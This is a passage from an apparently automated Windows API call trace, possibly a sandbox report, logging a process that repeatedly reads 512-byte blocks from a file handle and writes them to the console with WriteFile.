lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.217] GetFileType (hFile=0x50) returned 0x1 [0128.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] GetFileType (hFile=0x50) returned 0x1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.218] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.218] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.218] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.218] ReadFile 
(in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] GetFileType (hFile=0x50) returned 0x1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] GetFileType (hFile=0x50) returned 0x1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] GetFileType (hFile=0x50) returned 0x1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] GetFileType (hFile=0x50) returned 0x1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.218] GetFileType (hFile=0x50) returned 0x1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] GetFileType (hFile=0x50) returned 0x1 [0128.219] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] GetFileType (hFile=0x50) returned 0x1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] GetFileType (hFile=0x50) returned 0x1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.219] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.219] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.219] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.219] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] GetFileType (hFile=0x50) returned 0x1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] GetFileType (hFile=0x50) returned 0x1 [0128.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.219] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, 
lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] GetFileType (hFile=0x50) returned 0x1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] GetFileType (hFile=0x50) returned 0x1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] GetFileType (hFile=0x50) returned 0x1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] GetFileType (hFile=0x50) returned 0x1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] GetFileType (hFile=0x50) returned 0x1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, 
lpOverlapped=0x0) returned 1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] GetFileType (hFile=0x50) returned 0x1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.220] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.220] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.221] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.221] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] GetFileType (hFile=0x50) returned 0x1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] GetFileType (hFile=0x50) returned 0x1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] GetFileType (hFile=0x50) returned 0x1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] GetFileType (hFile=0x50) returned 0x1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] WriteFile (in: hFile=0x50, 
lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] GetFileType (hFile=0x50) returned 0x1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] GetFileType (hFile=0x50) returned 0x1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] GetFileType (hFile=0x50) returned 0x1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] GetFileType (hFile=0x50) returned 0x1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.222] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.222] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.222] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0128.222] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] GetFileType (hFile=0x50) returned 0x1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] GetFileType (hFile=0x50) returned 0x1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] GetFileType (hFile=0x50) returned 0x1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] GetFileType (hFile=0x50) returned 0x1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] GetFileType (hFile=0x50) returned 0x1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] 
GetFileType (hFile=0x50) returned 0x1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] GetFileType (hFile=0x50) returned 0x1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] GetFileType (hFile=0x50) returned 0x1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.223] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.223] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.223] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.223] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] GetFileType (hFile=0x50) returned 0x1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] GetFileType (hFile=0x50) returned 0x1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | 
out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] GetFileType (hFile=0x50) returned 0x1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] GetFileType (hFile=0x50) returned 0x1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] GetFileType (hFile=0x50) returned 0x1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] GetFileType (hFile=0x50) returned 0x1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] GetFileType (hFile=0x50) returned 0x1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, 
lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] GetFileType (hFile=0x50) returned 0x1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.225] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.225] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] GetFileType (hFile=0x50) returned 0x1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] GetFileType (hFile=0x50) returned 0x1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] GetFileType (hFile=0x50) returned 0x1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] GetFileType (hFile=0x50) returned 0x1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 
[0128.225] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] GetFileType (hFile=0x50) returned 0x1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] GetFileType (hFile=0x50) returned 0x1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] GetFileType (hFile=0x50) returned 0x1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] GetFileType (hFile=0x50) returned 0x1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.226] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.226] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) 
returned 1 [0128.226] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.226] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] GetFileType (hFile=0x50) returned 0x1 [0128.226] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: 
hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, 